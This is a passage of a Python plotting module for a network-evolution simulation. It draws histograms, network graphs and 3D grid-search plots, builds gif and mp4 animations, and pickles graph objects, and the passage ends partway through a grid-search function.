def plot_source_distribution(graph, num_bins=False, timestep=-1, show=False, save_fig=False, title=False):
"""
Plots source distribution over the course of the graphs history as a histogram
:param num_bins: Explicitly set the number of desired histogram bins. Default automatically sets for data
:param timestep: cut off point of graph history to examine source history. Defaults to the end of the graph
"""
if len(utility_funcs.arr_dimen(graph.source_node_history)) > 1:
source_distribution = np.array(graph.source_node_history)[:, :timestep].flatten()
else:
source_distribution = graph.source_node_history[:timestep]
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(source_distribution, bins=num_bins)
else:
plt.hist(source_distribution) # bins = auto, as per np.histogram
if timestep == -1:
plt.title(f"Source histogram for all edges final timestep ")
else:
plt.title(f"Source histogram for all edges timestep: {timestep} ")
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if save_fig:
plt.savefig(f'Source histogram with {num_bins} bins.png')
if show:
plt.show()
def plot_effective_distance_histogram(eff_dists, num_bins=False, timestep=-1, show=False, save_fig=False):
"""
TODO: consider deletion
"""
eff_dists = eff_dists.flatten()
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(eff_dists, bins=num_bins)
else:
plt.hist(eff_dists) # bins = auto, as per np.histogram
if timestep == -1:
plt.title(f"Effective distance histogram for all to all edges final timestep")
else:
plt.title(f"Effective distance histogram for all to all paths timestep: {timestep} ")
if save_fig:
plt.savefig(f'Effective distance histogram at step {timestep}.png')
if show:
plt.show()
# Network Illustrations: --------------------------------------------------------------------------------------------
def plot_nx_network(nx_graph, node_size_scaling=100, show=False, save_fig=False, title=None):
fig = plt.figure(figsize=(10, 10))
pos = nx.spring_layout(nx_graph, k=0.5, scale=0.5, weight='weight', seed=42)
labels = nx.draw_networkx_labels(nx_graph, pos=pos, font_color='blue', font_size=20) # For use in debugging
# labels = nx.draw_networkx_labels(nx_graph, pos=pos, font_color='blue', font_size=0) # For use in debugging
# node_weights = [1]*len(nx_graph.nodes())
node_weights = [weight*node_size_scaling for weight in nx.get_node_attributes(nx_graph, "weight").values()]
weights = [1.6 for u, v in nx_graph.edges()] # Simple binary weights
edge_colors = 'black'
nx.draw_networkx_edges(nx_graph, pos, nodelist=['0'], alpha=0.8, width=weights, arrowsize=4, edge_color=edge_colors, connectionstyle='arc3, rad=0.2', edge_cmap='winter')
node_colors = ['grey' for _ in nx_graph]
nx.draw_networkx_nodes(nx_graph, pos, node_size=node_weights, node_color=node_colors, linewidths=weights, label=labels, cmap=plt.get_cmap('viridis'))
plt.title(f"Network Graph")
if title:
plt.savefig(f'{title}.png')
if show:
plt.show()
if save_fig and not title:
plt.savefig(f'Network Structures.png')
plt.close(fig)
def plot_single_network(graph, timestep, directed=True, node_size_scaling=None, source_weighting=False, position=None, show=False, save_fig=False, seedless=False, title=None):
"""
:param timestep: Point at which the network's structure is to be graphed.
:param directed: As the Graph class considers only directed networks, this delta is not be to shifted unless considering undirected graphs.
:param node_size_scaling: Works as a scale for the size of nodes in the plot. Defaults to length of the graph (num_runs)
:param source_weighting: If True, nodes are scaled proportional to the number of times they have been the source. Only relevant for variable source seeding.
:param position: sets the position of the nodes, as used when ensuring that subsequent graphs are not shifting the node positions (e.g. for the animator)
"""
fig = plt.figure(figsize=(10, 10))
if directed:
nx_G = nx.to_directed(nx.from_numpy_matrix(np.array(graph.A[timestep]), create_using=nx.DiGraph))
else:
nx_G = nx.from_numpy_matrix(np.array(graph.A[timestep]))
if position: # allows for setting a constant layout
pos = nx.spring_layout(nx_G, weight='weight', pos=position, fixed=list(nx_G.nodes))
else:
pos = nx.spring_layout(nx_G, k=0.5, scale=0.5, weight='weight', seed=42)
if node_size_scaling is None:
node_size_scaling = 2*graph.nodes.shape[0] # So that nodes are sized proportional to the number of times they *could've* been the source
# labels = nx.draw_networkx_labels(nx_G, pos=pos, font_color='blue', font_size=20) # For use in debugging
labels = None
# pos = nx.drawing.layout.spring_layout(nx_G, k=0.5, pos=pos, weight='weight', fixed=list(nx_G.nodes))
weights = [np.round((nx_G[u][v]['weight'] * 2.5), 10) for u, v in nx_G.edges()]
nx.draw_networkx_edges(nx_G, pos, nodelist=['0'], alpha=0.8, width=weights, arrowsize=4, edge_color='k',
connectionstyle='arc3, rad=0.2', edge_cmap='winter')
node_colors = ['grey' for _ in nx_G]
if not seedless:
node_colors[graph.source_node_history[timestep - 1]] = 'red'
# edge_colors = range(2, nx_G.number_of_edges() + 2)
edge_colors = 'black'
if source_weighting: # sizes nodes proportional to the number of times they've been a source
source_weights = [graph.source_node_history[:timestep].count(node)*node_size_scaling for node in range(graph.nodes.shape[1]-1)]
# source_weight_sum = sum(source_weights)
# source_weights = [node_size_scaling*pow((weight/source_weight_sum), 0.5) for weight in source_weights]
source_weights = [weight if weight > 0 else 1*node_size_scaling for weight in source_weights]
nx.draw_networkx_nodes(nx_G, pos,
edgecolors=edge_colors,
node_size=source_weights,
node_color=node_colors,
linewidths=weights,
label=labels,
cmap=plt.get_cmap('viridis'))
plt.title(f"Nodes size proportional to number of times they've been the source [timestep: {timestep}]")
else:
incoming_edge_sum = graph.A[timestep].sum(axis=1)
incoming_edge_sum = [node_size_scaling * node / sum(incoming_edge_sum) for node in incoming_edge_sum]
nx.draw_networkx_nodes(nx_G, pos,
edgecolors=edge_colors,
node_size=incoming_edge_sum,
node_color=node_colors,
linewidths=weights,
label=labels,
cmap=plt.get_cmap('viridis'))
plt.title(f"Nodes size proportional to outgoing edge weights [timestep: {timestep}]")
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if show:
plt.show()
if save_fig and not title:
plt.savefig(f'Network Structure(s) after {graph.nodes.shape[0]} runs.png')
plt.close(fig)
def plot_network(graph, directed=True, node_size_scaling=200, nodes_sized_by_eff_distance=False, no_seeding=False,
show=False, save_fig=False, title=None):
"""
Plots the graph at four equispaced points spanning the entire time to denote network evolution through time in a single figure.
:param directed: As the Graph class considers only directed networks, this delta is not be to shifted unless considering undirected graphs.
:param node_size_scaling: Works as a scale for the size of nodes in the plot.
:param nodes_sized_by_eff_distance: Determines if the nodes are sized inversely proportional to their effective distance from the source 9at the timesteps at which at they are graphed)
"""
fig = plt.figure(figsize=(12, 6))
assert show or save_fig or title, 'Graph will be neither shown nor saved'
count = 1
timesteps = [0, int(graph.nodes.shape[0] / 3), int(graph.nodes.shape[0] * (2 / 3)), (graph.nodes.shape[0])-1]
for timestep in timesteps:
if directed:
nx_G = nx.to_directed(nx.from_numpy_matrix(np.array(graph.A[timestep]), create_using=nx.DiGraph))
if count == 1:
pos = nx.spring_layout(nx_G, k=0.5, scale=0.5, weight='weight')
# pos = nx.spring_layout(nx_G.reverse(copy=True), k=0.5, scale=0.5, weight='weight')
# Transposing is likely the intended effect, and more readily done
else:
nx_G = nx.from_numpy_matrix(np.array(graph.A[timestep]))
if count == 1:
pos = nx.spring_layout(nx_G, k=0.5, scale=5.0, weight='weight')
# pos = nx.spring_layout(nx_G.reverse(copy=True), k=0.5, scale=0.5, weight='weight')
# Transposing is likely the intended effect
incoming_edge_sum = graph.A[timestep].sum(axis=1)
plt.subplot(1, 4, count)
count += 1
weights = [nx_G[u][v]['weight'] * 1.5 for u, v in nx_G.edges()]
incoming_edge_sum = [(node_size_scaling * node / sum(incoming_edge_sum)) for node in incoming_edge_sum]
edge_colors = 'black'
node_colors = ['grey'] * graph.nodes.shape[1]
if not no_seeding: node_colors[graph.source_node_history[timestep]] = 'red'
nx.draw_networkx_edges(nx_G, pos, nodelist=['0'], alpha=0.8, width=weights, arrowsize=4, connectionstyle='arc3, rad=0.2')
nx.draw_networkx_nodes(G=nx_G, pos=pos,
edgecolors=edge_colors,
node_size=incoming_edge_sum,
node_color=node_colors,
linewidths=weights,
cmap=plt.get_cmap('viridis'))
plt.title("timestep: {0}".format(timestep))
if nodes_sized_by_eff_distance:
nx.draw_networkx_nodes(nx_G, pos,
edgecolors=edge_colors,
node_size=graph.nodes,
node_color=node_colors,
linewidths=weights,
cmap=plt.get_cmap('viridis'))
plt.title("timestep: {0}".format(timestep))
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if save_fig:
plt.savefig(f'Network Structure(s) for edge_to_eff_dist_coupling of {np.round(graph.edge_conservation_coefficient, 2)}, {graph.nodes.shape[0]} runs.png')
plt.close(fig)
# Network Animations: --------------------------------------------------------------------------------------------
def animate_network_evolution(graph, node_size_scaling=200, source_weighting=False, directory_name='network_animation',
file_title='network_evolution', parent_directory=None, gif_duration_in_sec=5,
num_runs_per_fig=None, verbose=False):
"""
Creates a gif and mp4 of the network evolution and stores them in a folder with the individual frames.
:param node_size_scaling: Works as a scale for the size of nodes in the plot. Defaults to length of the graph (num_runs)
:param source_weighting: If True, nodes are scaled proportional to the number of times they have been the source. Only relevant for variable source seeding.
:param directory_name: string, name of directory for resultant figures and animations. Of course, a path behind the title (e.g. directory_name=Path(directory_path, 'network_animation'))
determines the location of the resultant file as well.
:param file_title: string, sets title of resultant gif and mp4. by default, (if no path set into file title string) places the file into the above specified directory.
:param parent_directory: string, set to determine directory of output animation and stills. Defaults to the parent directory of this python file.
:param gif_duration_in_sec: int, determines the mp4 and gif's eventual duration in seconds.
:param num_runs_per_fig: int, set the number of runs between graphed figure (which individually compose the frames of the resultant animation)
:param verbose: bool, if True, prints intermediary % completion and eventual total time for completion.
"""
assert num_runs_per_fig != 0, 'Number of runs per figure must be larger than 0, or else omitted for graph every run'
if parent_directory is None:
source_directory = os.path.dirname(__file__)
else:
source_directory = parent_directory
vid_path = Path(source_directory, directory_name)
fig_path = Path(vid_path, 'figures')
try:
os.mkdir(vid_path), f'Created folder for network structure gif at {vid_path}'
os.mkdir(fig_path), f'Created folder for figures at {fig_path}'
except OSError:
print(f'{vid_path} already exists, adding or overwriting contents')
pass
nx_G = nx.to_directed(nx.from_numpy_matrix(np.array(graph.A[0]), create_using=nx.DiGraph))
initial_position = nx.drawing.layout.spring_layout(nx_G, k=0.5, scale=0.5, weight='weight')
for i in range(0, graph.A.shape[0] - 1):
files = Path(fig_path, f'{i:04}')
if num_runs_per_fig:
if i % num_runs_per_fig == 0:
plot_single_network(graph, i, node_size_scaling=node_size_scaling, source_weighting=source_weighting,
position=initial_position, show=False, save_fig=True, title=files)
else:
plot_single_network(graph, i, node_size_scaling=node_size_scaling, source_weighting=source_weighting,
position=initial_position, show=False, save_fig=True, title=files)
if verbose:
if int(i % graph.A.shape[0]) % int(graph.A.shape[0] / 10) == 0:
print(f'{(i / graph.A.shape[0]) * 100:.1f}%-ish done')
if i == graph.A.shape[0] - 1:
print('Now creating video from rendered images... (ignore resolution reformatting error)')
if num_runs_per_fig:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4',
fps=((graph.A.shape[0] / num_runs_per_fig) / gif_duration_in_sec))
else:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4', fps=(graph.A.shape[0] / gif_duration_in_sec))
images = []
for filename in sorted(os.listdir(fig_path)):
if filename.endswith(".png"):
images.append(imageio.imread(Path(fig_path, filename)))
writer.append_data(imageio.imread(Path(fig_path, filename)))
imageio.mimsave(f'{Path(vid_path, file_title)}.gif', images)
writer.close()
if verbose:
print(f'\n gif and mp4 of network evolution created in {vid_path} \n Stills stored in {fig_path} \n')
def parallelized_animate_network_evolution(graph, source_weighting=False, node_size_scaling=True, directory_name='network_animation',
file_title='network_evolution', parent_directory=None, gif_duration_in_sec=5,
num_runs_per_fig=None, changing_layout=False, verbose=False):
"""
Creates a gif and mp4 of the network evolution and stores them in a folder with the individual frames, using all system cores for frame generation individually.
:param node_size_scaling: Works as a scale for the size of nodes in the plot. Defaults to length of the graph (num_runs)
:param source_weighting: If True, nodes are scaled proportional to the number of times they have been the source. Only relevant for variable source seeding.
:param directory_name: string, name of directory for resultant figures and animations. Of course, a path behind the title (e.g. directory_name=Path(directory_path, 'network_animation'))
determines the location of the resultant file as well.
:param file_title: string, sets title of resultant gif and mp4. by default, (if no path set into file title string) places the file into the above specified directory.
:param parent_directory: string, set to determine directory of output animation and stills. Defaults to the parent directory of this python file.
:param gif_duration_in_sec: int, determines the mp4 and gif's eventual duration in seconds.
:param num_runs_per_fig: int, set the number of runs between graphed figure (which individually compose the frames of the resultant animation)
:param verbose: bool, if True, prints intermediary % completion and eventual total time for completion.
"""
assert num_runs_per_fig != 0, 'Number of runs per figure must be larger than 0, or else omitted for graph every run'
start_time = time.time()
if parent_directory is None:
source_directory = os.path.dirname(__file__)
else:
source_directory = parent_directory
vid_path = Path(source_directory, directory_name)
fig_path = Path(vid_path, 'figures')
try:
os.makedirs(vid_path), f'Created folder for network structure gif at {vid_path}'
os.makedirs(fig_path), f'Created folder for figures at {fig_path}'
except OSError:
print(f'{vid_path}/{fig_path} already exists, adding or overwriting contents')
pass
nx_G = nx.to_directed(nx.from_numpy_matrix(np.array(graph.A[0]), create_using=nx.DiGraph))
if changing_layout:
initial_position = None
else:
initial_position = nx.drawing.layout.spring_layout(nx_G, k=0.5, scale=0.5, weight='weight')
index = 0
while index < graph.A.shape[0] - 1:
processes = []
used_cores = 0
while used_cores < mp.cpu_count():
if index > graph.A.shape[0] - 1:
break
index += 1
files = Path(fig_path, f'{index:04}')
if num_runs_per_fig:
if index % num_runs_per_fig == 0 or index < 10: # As the first few are generally the most important
p = mp.Process(target=plot_single_network, args=(graph, index, True, node_size_scaling, source_weighting, initial_position, False, True, False, files))
p.start()
processes.append(p)
used_cores += 1
else:
p = mp.Process(target=plot_single_network, args=(graph, index, True, node_size_scaling, source_weighting, initial_position, False, True, False, files))
p.start()
processes.append(p)
used_cores += 1
if verbose:
utility_funcs.print_run_percentage(index, graph.A.shape[0])
if index == graph.A.shape[0]-1: print('Now creating video from rendered images... (ignore resolution reformatting error)')
for process in processes:
process.join()
if num_runs_per_fig:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4',
fps=((graph.A.shape[0] / num_runs_per_fig) / gif_duration_in_sec))
else:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4', fps=(graph.A.shape[0] / gif_duration_in_sec))
images = []
for filename in sorted(os.listdir(fig_path)):
if filename.endswith(".png"):
images.append(imageio.imread(Path(fig_path, filename)))
writer.append_data(imageio.imread(Path(fig_path, filename)))
imageio.mimsave(f'{Path(vid_path, file_title)}.gif', images)
writer.close()
if verbose:
print(f'\n gif and mp4 of network evolution created in {vid_path} \n Stills stored in {fig_path} \n')
print(f"Time to animate: {int((time.time()-start_time) / 60)} minutes, {np.round((time.time()-start_time) % 60, 2)} seconds")
# def animate_grid_search_results(graph, by_edge_conservation=True, data_directory=None, subdata_directory=None, gif_duration_in_sec=5, num_runs_per_fig=None, verbose=False):
"""
# Creates a gif and mp4 of the end networks running through parameter values and stores them in a folder with the individual frames, using all system cores for frame generation individually.
# :param gif_duration_in_sec: int, determines the mp4 and gif's eventual duration in seconds.
# :param num_runs_per_fig: int, set the number of runs between graphed figure (which individually compose the frames of the resultant animation)
# :param verbose: bool, if True, prints intermediary % completion and eventual total time for completion.
assert num_runs_per_fig != 0, 'Number of runs per figure must be larger than 0, or else omitted for graph every run'
start_time = time.time()
if subdata_directory is None:
subdata_directory = data_directory
print(f'No output directory given, defaulting to output_dir same as data directory at: \n {data_directory}')
vid_path = Path(data_directory, 'grid_search_animations')
try:
os.mkdir(vid_path), f'Created folder for grid_search gif at {vid_path}'
except OSError:
print(f'{vid_path} already exists, adding or overwriting contents')
pass
# num_cores_used = int(fraction_cores_used * mp.cpu_count())*(bool(int(fraction_cores_used * mp.cpu_count()))) + 1*(not bool(int(fraction_cores_used * mp.cpu_count())))
selectivity_val = float(str(str(data_directory).split('/')[-1]).split('_')[-1])
for root, dirs, files in os.walk(data_directory):
f = sorted(files) # Order preserved due to 0 padding.
for file in f:
with open(Path(data_directory, file), 'rb') as data:
G = pickle.load(data)
data.close()
if num_runs_per_fig:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4',
fps=((graph.A.shape[0] / num_runs_per_fig) / gif_duration_in_sec))
else:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4', fps=(graph.A.shape[0] / gif_duration_in_sec))
images = []
for filename in sorted(os.listdir(fig_path)):
if filename.endswith(".png"):
images.append(imageio.imread(Path(fig_path, filename)))
writer.append_data(imageio.imread(Path(fig_path, filename)))
imageio.mimsave(f'{Path(vid_path, file_title)}.gif', images)
writer.close()
if verbose:
print(f'\n gif and mp4 of network grid search created in {vid_path} \n Stills stored in {fig_path} \n')
print(f"Time lapsed {utility_funcs.time_lapsed_h_m_s(time.time() - start_time)}")
"""
# 2D Plotting: ------------------------------------------------------------------------------------------------------
def plot_2d_data(data, xlabel=None, ylabel=None, color=None, plot_limits=None, show=False, fig_title=None, title=False):
fig = plt.figure(figsize=(10, 8))
if plot_limits is not None:
if plot_limits[0]: plt.xlim(*plot_limits[0])
if plot_limits[1]: plt.ylim(*plot_limits[1])
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
x, y = data[:, 0], data[:, 1]
plt.scatter(x, y, c=color, cmap='viridis')
if show:
plt.show()
if fig_title:
plt.title(f'{fig_title}')
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
# 3D Plotting: ------------------------------------------------------------------------------------------------------
def plot_3d(function, x_range, y_range=None, piecewise=False, z_limits=None, spacing=0.05):
"""
Basic plotter for a 3d function, with the function to be given explicitly as z(x, y), along with the relevant x range.
:param function: z(x,y)
:param x_range: [lower bound, upper bound]
:param y_range: defaults to x_range, otherwise list as [lower bound, upper bound]
:param piecewise: set true if function is piecewise (i.e. contains conditional)
:param z_limits: [lower bound, upper bound]
:param spacing: interval between both x and y ranges.
"""
if y_range is None:
y_range = x_range
fig = plt.figure(figsize=(10, 8))
ax = fig.gca(projection='3d')
X = np.arange(x_range[0], x_range[1], spacing)
Y = np.arange(y_range[0], y_range[1], spacing)
if piecewise:
Z = np.zeros((len(X), len(Y)))
for i in range(len(X)):
for j in range(len(Y)):
Z[i][j] = function(X[i], Y[j])
X, Y = np.meshgrid(X, Y)
else:
X, Y = np.meshgrid(X, Y)
Z = function(X, Y)
surf = ax.plot_surface(X, Y, Z, cmap=cm.winter, linewidth=0, antialiased=False)
if z_limits:
ax.set_zlim(z_limits[0], z_limits[1])
ax.set_xlabel('Effective Distance')
ax.set_ylabel('Edge Value')
ax.set_zlabel('Info Score')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
plt.show()
def general_3d_data_plot(data, xlabel=None, ylabel=None, zlabel=None, plot_limits=None, color=None, plot_projections=False, projections=False, fig_title=None, show=False, title=False):
# :param plot_limits: give as a list of lists of limits, i.e. [[x_min, x_max], [y_min, y_max], [z_min, z_max]]
cmap = 'viridis'
if xlabel == 'Treeness' or xlabel == 'treeness':
xdata, ydata, zdata = data[:, 2], data[:, 1], data[:, 0]
else:
xdata, ydata, zdata = data[:, 0], data[:, 1], data[:, 2]
fig = plt.figure(figsize=(10, 10))
if xlabel is not None:
x_label = xlabel
else:
x_label = 'X'
if ylabel is not None:
y_label = ylabel
else:
y_label = 'Y'
if zlabel is not None:
z_label = zlabel
else:
z_label = 'Z'
if plot_projections:
gs = gridspec.GridSpec(3, 3, wspace=0.3)
ax = fig.add_subplot(gs[:2, :], projection='3d')
# norm = matplotlib.colors.Normalize(vmin=0, vmax=100)
ax.scatter(xdata, ydata, zdata, cmap=cmap, c=color) #, norm=norm)
ax.set_xlabel(x_label)
ax.set_ylabel(y_label)
ax.set_zlabel(z_label)
if plot_limits is not None:
if plot_limits[0]: ax.set_xlim3d(*plot_limits[0])
if plot_limits[1]: ax.set_ylim3d(*plot_limits[1])
if plot_limits[2]: ax.set_zlim3d(*plot_limits[2])
ax1 = fig.add_subplot(gs[2, 0])
ax1.scatter(xdata, ydata, cmap=cmap, c=color)
plt.grid(True)
ax1.set_xlabel(x_label)
ax1.set_ylabel(y_label)
ax2 = fig.add_subplot(gs[2, 1])
ax2.scatter(xdata, zdata, cmap=cmap, c=color)
plt.grid(True)
ax2.set_xlabel(x_label)
ax2.set_ylabel(z_label)
ax3 = fig.add_subplot(gs[2, 2])
ax3.scatter(ydata, zdata, cmap=cmap, c=color)
plt.grid(True)
ax3.set_xlabel(y_label)
ax3.set_ylabel(z_label)
fig.align_labels()
if fig_title:
ax.set_title(f'{fig_title}')
if title:
plt.savefig(f'{title}.png')
plt.close()
if show:
plt.show()
else:
ax = fig.add_subplot(111, projection='3d')
# norm = matplotlib.colors.Normalize(vmin=0, vmax=100)
ax.scatter(xdata, ydata, zdata, cmap=cmap, c=color) #, norm=norm)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
ax.set_zlabel(zlabel)
if plot_limits is not None:
if plot_limits[0]: ax.set_xlim3d(*plot_limits[0])
if plot_limits[1]: ax.set_ylim3d(*plot_limits[1])
if plot_limits[2]: ax.set_zlim3d(*plot_limits[2])
if projections:
ax.plot(xdata, zdata, 'r+', zdir='y', zs=1)
ax.plot(ydata, zdata, 'g+', zdir='x', zs=0)
ax.plot(xdata, ydata, 'k+', zdir='z', zs=-1)
if show:
plt.show()
if fig_title:
plt.title(f'{fig_title}')
if title:
plt.savefig(f'{title}.png')
plt.close()
def plot_3d_data(three_d_data, x_range=None, y_range=None, z_range=None, show=False, raw_fig_title=None):
"""
Plots 3d data (np.dim=3)
:param three_d_data: 3 dimensional data to be plotted.
:param raw_fig_title: determines the title (presumably with trailing dir_path) of fig's raw pickled (saved) form, to allow for loading via another pytohn program later.
As 3d matplotlib objects cannot be opened by another software
"""
fig = plt.figure(figsize=(10, 8))
ax = fig.add_subplot(111, projection='3d')
data = np.swapaxes(np.swapaxes(three_d_data, 0, 1), 1, 2) # sliding node_num axis to last
xs = np.repeat(x_range, data.shape[1] * data.shape[2], axis=0).flatten()
ys = np.repeat([y_range], data.shape[0] * data.shape[2], axis=0).flatten()
zs = np.repeat([z_range], data.shape[0] * data.shape[1], axis=0).flatten()
print(f'data.shape {data.shape}')
data = np.round(data.flatten(), 6)
# print(f'xs: ys: zs: \n {xs}, \n {ys}, \n {zs}')
# print(f'xs.size, ys.size, zs.size, data.size: {xs.size}, {ys.size}, {zs.size}, {data.size}')
logged_data = np.log(abs(data))
# TODO: here the questionable assumption of the data being entirely positive/negative is used. FIX
img = ax.scatter(xs, ys, zs, c=logged_data, cmap=plt.winter())
fig.colorbar(img)
ax.set_xlabel('Coupling')
ax.set_ylabel('Adaptation')
ax.set_zlabel('Nodes')
if show:
plt.show()
if raw_fig_title:
save_object(plt.figure(), str(raw_fig_title)+".pkl")
def three_d_plot_from_data(path_to_data_dir, edge_conservation_range, selectivity_range, normalized=False, output_dir=None):
"""
Renders a 3D plot from data, as when completing a 3D grid-search, with coloration of data points to indicate 4D data
Presently, plots: average neighbor variance and effective distance differences
:param path_to_data_dir: string, path to dara directory
:param edge_conservation_range: floats; np.array, full range of values for edge conservation (coupling)
:param selectivity_range: floats; np.array, full sequence of selectivity values
:param normalized: bool, optional amax normalization of variance and effective distance differences
:param output_dir: string, output directory
"""
if output_dir is None:
output_dir = path_to_data_dir
eff_dists_all_nodes = np.zeros((1, edge_conservation_range.size, selectivity_range.size))
ave_nbr_var_all_nodes = np.zeros((1, edge_conservation_range.size, selectivity_range.size))
eff_dist_diffs_flattened = []
ave_nbr_var_flattened = []
node_nums = []
node_files = []
sub_dirs = sorted([dirs[0] for dirs in os.walk(path_to_data_dir) if dirs[0] != str(path_to_data_dir)])
for sub_dir in sub_dirs:
node_nums.append(int(str(str(sub_dir).split('/')[-1]).split('_')[-1]))
tmp_data_files = [files[2] for files in os.walk(Path(path_to_data_dir, sub_dir))]
node_files.append(sorted(tmp_data_files[0]))
node_files = np.array(node_files)
for node_index in range(node_files.shape[0]):
for file_index in range(node_files.shape[1]):
with open(Path(sub_dirs[node_index], node_files[node_index][file_index]), 'rb') as input:
G = pickle.load(input)
input.close()
last_ave_nbr_deg = list(nx.average_neighbor_degree(G.convert_to_nx_graph(timestep=-1), source='in', target='in', weight='weight').values())
ave_nbr_var_flattened.append(np.array(last_ave_nbr_deg).var())
eff_dist_diffs_flattened.append(G.eff_dist_diff(multiple_path_eff_dist=False)) # Compares first and last eff_dist values
eff_dists_all_nodes = np.vstack((eff_dists_all_nodes, [np.array(eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size)]))
ave_nbr_var_all_nodes = np.vstack((ave_nbr_var_all_nodes, [np.array(ave_nbr_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size)]))
eff_dist_diffs_flattened = []
ave_nbr_var_flattened = []
eff_dists_all_nodes = np.delete(eff_dists_all_nodes, 0, axis=0)
ave_nbr_var_all_nodes = np.delete(ave_nbr_var_all_nodes, 0, axis=0)
if normalized:
eff_dists_all_nodes /= np.amax(eff_dists_all_nodes)
ave_nbr_var_all_nodes /= np.amax(ave_nbr_var_all_nodes)
plot_3d_data(eff_dists_all_nodes, x_range=edge_conservation_range, y_range=selectivity_range, z_range=np.array(node_nums), raw_fig_title=Path(output_dir, "Eff_dist_diff_Grid_Search"))
plot_3d_data(ave_nbr_var_all_nodes, x_range=edge_conservation_range, y_range=selectivity_range, z_range=np.array(node_nums), raw_fig_title=Path(output_dir, "Ave_nbr_var_Grid_Search"))
# System Functions: -------------------------------------------------------------------------------------------------
def save_object(obj, filename):
"""
Saves object as pickle extension for future retrieval via another python program
:param obj: (python) Object to be saved
:param filename: Name of saved object
"""
with open(filename, 'wb') as output: # Overwrites any existing file.
pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)
del obj
def open_graph_obj(path, graph_id):
"""
Opens graph IF SPECIFIED VIA '{graph_id}_graph_obj.pkl format as filename
:param path: abs path to (.pkl) file
:param graph_id: id as string (e.g. '0012')
:return: [graph] class object
"""
with open(Path(path, f'{graph_id}_graph_obj.pkl'), 'rb') as input:
return pickle.load(input)
def open_figure(path, filename):
# TODO: Evidently does not work with present implementation of matplotlib for interactive plots (e.g. 4d heatmap)
if filename.endswith('.pkl'):
with open(Path(path, filename), 'rb') as fig:
ax = pickle.load(fig)
else:
with open(Path(path, (str(filename)+'.pkl')), 'rb') as fig:
ax = pickle.load(fig)
plt.show()
# Grid Search: ------------------------------------------------------------------------------------------------------
def grid_search_plots(data_directory, edge_conservation_range, selectivity_range, num_nodes, source_reward=2.6, eff_dist=False, global_eff_dist=False, network_graphs=False, node_plots=False, ave_nbr=False, cluster_coeff=False, shortest_path=False, degree_dist=False, edge_dist=False, meta_plots=True, null_sim=False, interpolate=None, output_dir=None):
"""
Runs grid-search, and then creates all plots for a given dataset (sub)directory, and puts the results in new appropriately named subdirectories. Meta-plots controled by graph initialization
# Parallelization implementation ensures completion of all plots per dataset (or as many as supportable by the number of cpu cores) before continuing to the following set
:param data_directory: string; Path obj, path to data directory
:param edge_conservation_range: float; np.arange, full sequence of edge_conservation values
:param selectivity_range: float; np.arange, full sequence of selectivity values
:param num_nodes: int number of nodes used in simulation -> graph generation. (iterated over via shell command for node num grid-search)
:param ave_nbr: bool; determines if average neighbor degree plots are created
:param cluster_coeff: bool; determines if cluster coefficient plots are created
:param shortest_path: bool; determines if shortest path plots are created
:param degree_dist: bool; determines if degree distribution plots are created
:param output_dir: string; path obj. Determines output directory, defaults to data directory
"""
start_time = time.time()
# assert eff_dist or global_eff_dist or network_graphs or node_plots or ave_nbr or cluster_coeff or shortest_path or degree_dist or edge_dist, 'Choose something to plot'
if output_dir is None:
output_dir = data_directory.parents[0]
grid_search_plots_dir = output_dir
if eff_dist: eff_dist_path = Path(grid_search_plots_dir, 'eff_dist_plots')
if network_graphs: graph_path = Path(grid_search_plots_dir, 'network_graphs')
if node_plots: node_path = Path(grid_search_plots_dir, 'node_plots')
if ave_nbr: neighbor_path = Path(grid_search_plots_dir, 'ave_neighbor_plots')
if cluster_coeff: cluster_coeff_path = Path(grid_search_plots_dir, 'cluster_coefficients_plots')
if shortest_path: shortest_paths_path = Path(grid_search_plots_dir, 'shortest_paths_plots')
if degree_dist: degree_dist_path = Path(grid_search_plots_dir, 'degree_dist_plots')
if edge_dist: edge_dist_path = Path(grid_search_plots_dir, 'edge_dist_plots')
if global_eff_dist: all_to_all_eff_dist_path = Path(grid_search_plots_dir, 'global_eff_dist_plots')
try:
if eff_dist: os.makedirs(eff_dist_path), f'Created folder for graphs at {eff_dist_path}'
if network_graphs: os.makedirs(graph_path), f'Created folder for graphs at {graph_path}'
if node_plots: os.makedirs(node_path), f'Created folder for node plots at {node_path}'
if ave_nbr: os.makedirs(neighbor_path), f'Created folder for neighbor graph at {neighbor_path}'
if cluster_coeff: os.makedirs(cluster_coeff_path), f'Created folder for cluster coeff graphs at {cluster_coeff_path}'
if shortest_path: os.makedirs(shortest_paths_path), f'Created folder for shortest path graphs at {shortest_paths_path}'
if degree_dist: os.makedirs(degree_dist_path), f'Created folder for degree distribution graphs at {degree_dist_path}'
if edge_dist: os.makedirs(edge_dist_path), f'Created folder for degree distribution graphs at {edge_dist_path}'
if global_eff_dist: os.makedirs(all_to_all_eff_dist_path), f'Created folder for global eff dist graphs at {all_to_all_eff_dist_path}'
except OSError:
print(f'{grid_search_plots_dir} already exists, adding or overwriting contents')
pass
cores_used = mp.cpu_count() - 3
run_counter = 0
f = []
eff_dist_diffs_flattened = []
mean_eff_dist_diffs_flattened = []
global_eff_dist_diffs_flattened = []
log_degree_dist_var_flattened = []
ave_nbr_var_flattened = []
ave_cluster_flattened = []
ave_shortest_path_flattened = []
efficiency_coordinates = []
linear_threshold_hierarchy_coordinates = []
exp_threshold_hierarchy_coordinates = []
def meta_plot_data_compiler():
if not null_sim:
if G.observed_observables['eff_dist_diff']: eff_dist_diffs_flattened.append(G.source_eff_dist_diff)
